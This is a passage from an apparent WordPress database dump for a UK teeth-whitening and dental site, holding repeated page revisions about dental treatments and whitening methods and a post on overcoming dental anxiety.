implants</a>.</em></blockquote>\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','inherit','closed','closed','','13-revision-v1','','','2018-04-17 13:21:20','2018-04-17 13:21:20','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-revision-v1/',0,'revision','',0),(125,1,'2018-04-17 13:22:00','2018-04-17 13:22:00','<a href=\"/\"><img class=\"alignnone wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"leading dentistry london essex\" width=\"872\" height=\"466\" /></a>\r\n<h2>Find out how we can help you</h2>\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n<blockquote><em>If you\'re looking for specialist periodontics we recommend <strong>Al-Fa Perio Clinic in Essex</strong>. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.</em></blockquote>\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','inherit','closed','closed','','13-revision-v1','','','2018-04-17 13:22:00','2018-04-17 13:22:00','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-revision-v1/',0,'revision','',0),(127,1,'2018-08-14 11:03:10','2018-08-14 11:03:10','<a href=\"https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile/can-you-make-dental-implants-last-forever/\" target=\"_blank\" rel=\"noopener\">There are various ways of achieving the perfect smile</a>, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2><a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Different Whitening Techniques:</a></h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\n<a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\"><img class=\"size-full wp-image-133 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/smilemoredental.jpg\" alt=\"Teeth Whitening at Smile More Dental\" width=\"165\" height=\"69\" /></a>You will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n\r\n<em>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\n<a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\"><img class=\"wp-image-137 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/bbbeauty.png\" alt=\"Teeth whitening treatments\" width=\"118\" height=\"89\" /></a>Your choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. <a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\" target=\"_blank\" rel=\"noopener\">See more information</a>.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.\r\n\r\nRead more on <a href=\"https://teethwhiteningproduct.co.uk/dentists/\">cosmetic dental treatments</a> that are available.</blockquote>','How to Achieve the Perfect Smile','','publish','closed','closed','','how-to-achieve-the-perfect-smile','','','2018-09-26 11:57:43','2018-09-26 11:57:43','',0,'https://teethwhiteningproduct.co.uk/?p=127',0,'page','',0),(128,1,'2018-09-04 11:03:10','2018-09-04 11:03:10','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2>Different Whitening Techniques:</h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\nYou will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\nYour choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-04 11:03:10','2018-09-04 11:03:10','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-revision-v1/',0,'revision','',0),(129,1,'2018-09-04 11:04:41','2018-09-04 11:04:41','','white-teeth','','inherit','closed','closed','','white-teeth','','','2018-09-04 11:04:57','2018-09-04 11:04:57','',127,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/white-teeth.jpg',0,'attachment','image/jpeg',0),(130,1,'2018-09-04 11:06:54','2018-09-04 11:06:54','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2>Different Whitening Techniques:</h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\nYou will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n\r\nVisit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\nYour choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-04 11:06:54','2018-09-04 11:06:54','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-revision-v1/',0,'revision','',0),(131,1,'2018-09-04 11:07:57','2018-09-04 11:07:57','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\n\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\n<h2>Different Whitening Techniques:</h2>\n<h4>Zoom:</h4>\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\n\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\n\nYou will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\n\n<em>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\n<h4>Home Whitening:</h4>\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\n\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\n\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\n\nYour choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. See more information.\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-autosave-v1','','','2018-09-04 11:07:57','2018-09-04 11:07:57','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-autosave-v1/',0,'revision','',0),(132,1,'2018-09-04 11:08:45','2018-09-04 11:08:45','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2><a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Different Whitening Techniques:</a></h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\nYou will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n\r\n<em>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\nYour choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. <a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\" target=\"_blank\" rel=\"noopener\">See more information</a>.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.\r\n\r\nRead more on <a href=\"https://teethwhiteningproduct.co.uk/dentists/\">cosmetic dental treatments</a> that are available.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-04 11:08:45','2018-09-04 11:08:45','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-revision-v1/',0,'revision','',0),(133,1,'2018-09-04 11:09:51','2018-09-04 11:09:51','','smilemoredental','','inherit','closed','closed','','smilemoredental','','','2018-09-04 11:10:04','2018-09-04 11:10:04','',127,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/smilemoredental.jpg',0,'attachment','image/jpeg',0),(134,1,'2018-09-04 11:10:10','2018-09-04 11:10:10','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2><a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Different Whitening Techniques:</a></h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\nYou will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n\r\n<em><a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\"><img class=\"size-full wp-image-133 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/smilemoredental.jpg\" alt=\"Teeth Whitening at Smile More Dental\" width=\"165\" height=\"69\" /></a>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\nYour choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. <a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\" target=\"_blank\" rel=\"noopener\">See more information</a>.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.\r\n\r\nRead more on <a href=\"https://teethwhiteningproduct.co.uk/dentists/\">cosmetic dental treatments</a> that are available.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-04 11:10:10','2018-09-04 11:10:10','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-revision-v1/',0,'revision','',0),(135,1,'2018-09-04 11:10:24','2018-09-04 11:10:24','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2><a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Different Whitening Techniques:</a></h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\nYou will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.<a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\"><img class=\"size-full wp-image-133 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/smilemoredental.jpg\" alt=\"Teeth Whitening at Smile More Dental\" width=\"165\" height=\"69\" /></a></em>\r\n\r\n<em>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\nYour choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. <a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\" target=\"_blank\" rel=\"noopener\">See more information</a>.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.\r\n\r\nRead more on <a href=\"https://teethwhiteningproduct.co.uk/dentists/\">cosmetic dental treatments</a> that are available.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-04 11:10:24','2018-09-04 11:10:24','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-revision-v1/',0,'revision','',0),(136,1,'2018-09-04 11:10:33','2018-09-04 11:10:33','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2><a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Different Whitening Techniques:</a></h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\n<a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\"><img class=\"size-full wp-image-133 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/smilemoredental.jpg\" alt=\"Teeth Whitening at Smile More Dental\" width=\"165\" height=\"69\" /></a>You will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n\r\n<em>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\nYour choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. <a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\" target=\"_blank\" rel=\"noopener\">See more information</a>.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.\r\n\r\nRead more on <a href=\"https://teethwhiteningproduct.co.uk/dentists/\">cosmetic dental treatments</a> that are available.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-04 11:10:33','2018-09-04 11:10:33','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-revision-v1/',0,'revision','',0),(137,1,'2018-09-04 11:11:01','2018-09-04 11:11:01','','bbbeauty','','inherit','closed','closed','','bbbeauty','','','2018-09-04 11:11:12','2018-09-04 11:11:12','',127,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/bbbeauty.png',0,'attachment','image/png',0),(138,1,'2018-09-04 11:11:21','2018-09-04 11:11:21','There are various ways of achieving the perfect smile, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2><a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Different Whitening Techniques:</a></h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\n<a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\"><img class=\"size-full wp-image-133 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/smilemoredental.jpg\" alt=\"Teeth Whitening at Smile More Dental\" width=\"165\" height=\"69\" /></a>You will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n\r\n<em>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\n<a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\"><img class=\"wp-image-137 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/bbbeauty.png\" alt=\"Teeth whitening treatments\" width=\"118\" height=\"89\" /></a>Your choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. <a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\" target=\"_blank\" rel=\"noopener\">See more information</a>.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.\r\n\r\nRead more on <a href=\"https://teethwhiteningproduct.co.uk/dentists/\">cosmetic dental treatments</a> that are available.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-04 11:11:21','2018-09-04 11:11:21','',127,'https://teethwhiteningproduct.co.uk/2018/09/04/127-revision-v1/',0,'revision','',0),(140,1,'2018-09-04 11:12:28','2018-09-04 11:12:28','','Perfect Smile','','publish','closed','closed','','perfect-smile','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/2018/09/04/perfect-smile/',4,'nav_menu_item','',0),(142,1,'2018-09-24 12:56:17','2018-09-24 12:56:17','<h2>How can someone overcome Dental Anxiety?</h2>\r\nIn the UK, <em>it’s extremely common</em> for adults to have some f<strong>orm of dental anxiety.</strong> In fact, one in every three people has moderate dental anxiety. Dental anxiety can cause people to<em> refuse to visit the dentist</em> or <strong>ask for help regarding their own oral health.</strong>\r\n<blockquote><a href=\"https://www.nhs.uk/live-well/healthy-body/fear-of-the-dentist-help/\" target=\"_blank\" rel=\"noopener\">“One in four people in the UK dread to visit the dentist, however avoiding the dentist can lead to further complications.”</a></blockquote>\r\nIt’s becoming<em> increasingly common</em> for young adults in their 20s or 30s <strong>to avoid going to the dentist because of fears or phobias.</strong> The <strong>risk</strong> of cavities or gum disease is <strong>greatly reduced if people visit their dentist at least once a year.</strong> However, <em>fear is preventing</em> people from visiting their dentist.\r\n<h2>What can you do to reduce yours or someone else’s Dental Anxiety?</h2>\r\n<img class=\"alignnone size-full wp-image-145\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/dentist-2530990_960_720.jpg\" alt=\"\" width=\"960\" height=\"637\" />\r\n\r\nThere are <em>numerous ways</em> to help <strong>relax and maintain your composure when visiting the dentist.</strong> This can be done in various solutions include; taking a friend with you, listening to your own music and having an early appointment to have less time during the day to think about it.\r\n<blockquote>“Constant communication with your dentist is critical. Make sure they’re fully aware of your own comfort and well-being, ensuring that the dentist does all they can to make sure you are relaxed.”</blockquote>\r\nMost importantly, you should <strong>make your dentist aware of your anxiety about dentistry.</strong> Dentists provide a <a href=\"https://www.shinedentalcare.co.uk/general-dentistry/nervous-patients-nottinghamshire/\" target=\"_blank\" rel=\"noopener\"><em>wealth of support and solutions</em></a> to ensure <strong>you aren’t panicking or worrying about your dentist check-up.</strong>\r\n\r\n<strong>Overcoming our dental anxiety isn’t impossible.</strong> If you’re still concerned about visiting the dentist, <a href=\"https://www.dentalfearcentral.org/\" target=\"_blank\" rel=\"noopener\">read more</a> about how you can <em>clear your mind</em> and <strong>go to the dentist without any fear or anxiety.</strong>','Is there a way to help get over Dental Anxiety?','','publish','closed','closed','','is-there-a-way-to-help-get-over-dental-anxiety','','','2018-09-24 12:56:17','2018-09-24 12:56:17','',0,'https://teethwhiteningproduct.co.uk/?p=142',0,'post','',0),(143,1,'2018-09-24 12:52:32','2018-09-24 12:52:32','<h2>How can someone overcome Dental Anxiety?</h2>\r\nIn the UK, <em>it’s extremely common</em> for adults to have some f<strong>orm of dental anxiety.</strong> In fact, one in every three people has moderate dental anxiety. Dental anxiety can cause people to<em> refuse to visit the dentist</em> or <strong>ask for help regarding their own oral health.</strong>\r\n<blockquote>“One in four people in the UK dread to visit the dentist, however avoiding the dentist can lead to further complications.”</blockquote>\r\nIt’s becoming<em> increasingly common</em> for young adults in their 20s or 30s <strong>to avoid going to the dentist because of fears or phobias.</strong> The <strong>risk</strong> of cavities or gum disease is <strong>greatly reduced if people visit their dentist at least once a year.</strong> However, <em>fear is preventing</em> people from visiting their dentist.\r\n<h2>What can you do to reduce yours or someone else’s Dental Anxiety?</h2>\r\nThere are <em>numerous ways</em> to help <strong>relax and maintain your composure when visiting the dentist.</strong> This can be done in various solutions include; taking a friend with you, listening to your own music and having an early appointment to have less time during the day to think about it.\r\n<blockquote>“Constant communication with your dentist is critical. Make sure they’re fully aware of your own comfort and well-being, ensuring that the dentist does all they can to make sure you are relaxed.”</blockquote>\r\nMost importantly, you should <strong>make your dentist aware of your anxiety about dentistry.</strong> Dentists provide a <em>wealth of support and solutions</em> to ensure <strong>you aren’t panicking or worrying about your dentist check-up.</strong>\r\n\r\n<strong>Overcoming our dental anxiety isn’t impossible.</strong> If you’re still concerned about visiting the dentist, read more about how you can <em>clear your 